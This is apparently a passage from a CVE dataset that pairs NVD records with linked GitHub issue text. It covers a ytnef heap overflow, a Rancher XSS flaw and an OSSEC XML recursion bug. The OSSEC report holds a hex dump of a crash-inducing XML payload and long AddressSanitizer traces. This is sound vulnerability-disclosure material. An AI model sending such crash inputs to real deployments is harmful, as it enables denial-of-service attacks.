=================================================================
==2699631==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000032 at pc 0x000000498907 bp 0x7fffffffdf50 sp 0x7fffffffd718
READ of size 2 at 0x602000000032 thread T0
#0 0x498906 in __asan_memcpy (/home/kali/ytnef/asan/bin/ytnef+0x498906)
#1 0x7ffff7f51e90 in SwapWord /home/kali/ytnef/lib/ytnef.c:155:26
#2 0x7ffff7f51e90 in TNEFVersion /home/kali/ytnef/lib/ytnef.c:343:11
#3 0x7ffff7f68243 in TNEFParse /home/kali/ytnef/lib/ytnef.c:1220:15
#4 0x7ffff7f664d9 in TNEFParseFile /home/kali/ytnef/lib/ytnef.c:1077:10
#5 0x4c975c in main /home/kali/ytnef/ytnef/main.c:140:9
#6 0x7ffff7bf9d09 in __libc_start_main csu/../csu/libc-start.c:308:16
#7 0x41f439 in _start (/home/kali/ytnef/asan/bin/ytnef+0x41f439)
0x602000000032 is located 1 bytes to the right of 1-byte region [0x602000000030,0x602000000031)
allocated by thread T0 here:
#0 0x499622 in calloc (/home/kali/ytnef/asan/bin/ytnef+0x499622)
#1 0x7ffff7f676d9 in TNEFParse /home/kali/ytnef/lib/ytnef.c:1190:12
#2 0x7ffff7f664d9 in TNEFParseFile /home/kali/ytnef/lib/ytnef.c:1077:10
#3 0x4c975c in main /home/kali/ytnef/ytnef/main.c:140:9
#4 0x7ffff7bf9d09 in __libc_start_main csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/kali/ytnef/asan/bin/ytnef+0x498906) in __asan_memcpy
Shadow bytes around the buggy address:
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa fd fa fa fa[01]fa fa fa fa fa fa fa fa fa
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2699631==ABORTING
```
I have attached a minimal reproducer of this crash: [heap.zip](https://github.com/Yeraze/ytnef/files/5897875/heap.zip) | Heap buffer overflow via TNEFVersion | https://api.github.com/repos/Yeraze/ytnef/issues/86/comments | 1 | 2021-01-30T11:51:28Z | 2021-03-05T14:05:15Z | https://github.com/Yeraze/ytnef/issues/86 | 797,400,610 | 86 | 1,738 |
CVE-2021-25313 | 2021-03-05T09:15:13.503 | A Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rancher allows remote attackers to execute JavaScript via malicious links. This issue affects: SUSE Rancher Rancher versions prior to 2.5.6. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "meissner@suse.de",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "meissner@suse.de",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1181852"
},
{
"source": "meissner@suse.de",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rancher/rancher/issues/31583"
},
{
"source": "meissner@suse.de",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/rancher/rancher/releases/tag/v2.5.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://bugzilla.suse.com/show_bug.cgi?id=1181852"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/rancher/rancher/issues/31583"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/rancher/rancher/releases/tag/v2.5.6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:suse:rancher:*:*:*:*:*:*:*:*",
"matchCriteriaId": "409DC667-DF62-4860-B9C1-F8060D93631D",
"versionEndExcluding": "2.5.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/rancher/rancher/issues/31583 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"rancher",
"rancher"
] | When accessing the Rancher API with a browser, user input in the URL was not properly escaped and was vulnerable to an XSS attack. Specially crafted URLs to these API endpoints could include JavaScript which would be embedded in the page and execute in a browser. There is no direct mitigation. Avoid clicking on untrusted links to your Rancher server.
This has been resolved in Rancher v2.3.11, v2.4.14 and v2.5.6. | XSS script execution vulnerability | https://api.github.com/repos/rancher/rancher/issues/31583/comments | 0 | 2021-03-04T05:15:24Z | 2021-06-02T12:03:29Z | https://github.com/rancher/rancher/issues/31583 | 821,761,554 | 31,583 | 1,739 |
CVE-2021-28040 | 2021-03-05T18:15:13.270 | An issue was discovered in OSSEC 3.6.0. An uncontrolled recursion vulnerability in os_xml.c occurs when a large number of opening and closing XML tags is used. Because recursion is used in _ReadElem without restriction, an attacker can trigger a segmentation fault once unmapped memory is reached. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ossec/ossec-hids/issues/1953"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ossec/ossec-hids/issues/1953"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ossec:ossec:3.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "5194EBBE-813E-4C77-BE63-1302B9E88855",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"674"
] | 674 | https://github.com/ossec/ossec-hids/issues/1953 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ossec",
"ossec-hids"
] | # os_xml _ReadElem() - Uncontrolled recursion vulnerability
## INTRODUCTION
An Uncontrolled Recursion vulnerability has been identified in the `os_xml` XML parsing library used by OSSEC.
Through the `os_xml/examples/test.c` code, a flaw has been identified in `os_xml.c` that allows non-defined recursion cycles,
thus finally trying to access non-mapped memory once the stack end has been reached.
The payload consists on a number of `<>` which will trigger the recursion and finally ending it with
`<\n`.
## REPRODUCE
To reproduce this vulnerability, compile the `examples/test.c` and open the payload file with it.
```
lockedbyte@pwn:~/research/OSSEC/os_xml$ ./test ./crash.xml
Segmentation fault (core dumped)
lockedbyte@pwn:~/research/OSSEC/os_xml$ xxd ./crash.xml
00000000: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000010: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000020: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000030: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000040: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000050: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000060: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000070: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000080: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000090: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000000a0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000000b0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000000c0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000000d0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000000e0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000000f0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000100: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000110: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000120: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000130: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000140: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000150: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000160: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000170: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000180: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000190: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000001a0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000001b0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000001c0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000001d0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000001e0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000001f0: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000200: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000210: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000220: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000230: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000240: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000250: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000260: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000270: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000280: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
00000290: 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e 3c3e <><><><><><><><>
000002a0: 3c3e 3c3e 3c0a <><><.
lockedbyte@pwn:~/research/OSSEC/os_xml$
```
If we compile `examples/test.c` with ASAN (AddressSanatizer), this is the output we are given:
```
root@ubuntu:/software/os_xml# ./test_asan ./crash.xml
AddressSanitizer:DEADLYSIGNAL
=================================================================
==171980==ERROR: AddressSanitizer: stack-overflow on address 0x7fffff7fe0e8 (pc 0x555555557f61 bp 0x0ffffeea6e7b sp 0x7fffff7fe0e8 T0)
#0 0x555555557f60 in _getattributes /software/os_xml/os_xml.c:417
#1 0x55555555a77f in _ReadElem /software/os_xml/os_xml.c:242
#2 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#3 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#4 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#5 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#6 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#7 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#8 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#9 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#10 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#11 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#12 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#13 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#14 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#15 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#16 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#17 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#18 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#19 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#20 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#21 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#22 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#23 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#24 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#25 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#26 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#27 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#28 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#29 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#30 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#31 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#32 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#33 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#34 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#35 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#36 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#37 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#38 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#39 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#40 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#41 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#42 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#43 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#44 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#45 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#46 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#47 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#48 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#49 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#50 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#51 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#52 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#53 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#54 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#55 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#56 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#57 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#58 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#59 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#60 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#61 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#62 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#63 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#64 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#65 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#66 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#67 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#68 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#69 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#70 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#71 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#72 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#73 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#74 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#75 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#76 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#77 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#78 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#79 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#80 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#81 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#82 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#83 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#84 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#85 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#86 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#87 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#88 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#89 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#90 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#91 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#92 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#93 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#94 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#95 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#96 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#97 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#98 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#99 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#100 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#101 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#102 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#103 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#104 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#105 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#106 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#107 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#108 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#109 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#110 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#111 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#112 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#113 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#114 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#115 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#116 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#117 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#118 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#119 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#120 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#121 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#122 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#123 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#124 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#125 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#126 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#127 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#128 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#129 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#130 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#131 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#132 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#133 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#134 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#135 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#136 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#137 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#138 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#139 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#140 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#141 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#142 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#143 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#144 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#145 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#146 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#147 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#148 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#149 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#150 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#151 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#152 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#153 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#154 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#155 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#156 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#157 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#158 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#159 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#160 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#161 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#162 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#163 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#164 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#165 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#166 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#167 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#168 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#169 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#170 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#171 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#172 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#173 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#174 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#175 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#176 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#177 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#178 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#179 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#180 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#181 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#182 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#183 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#184 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#185 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#186 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#187 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#188 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#189 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#190 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
#191 0x55555555a9d2 in _ReadElem /software/os_xml/os_xml.c:298
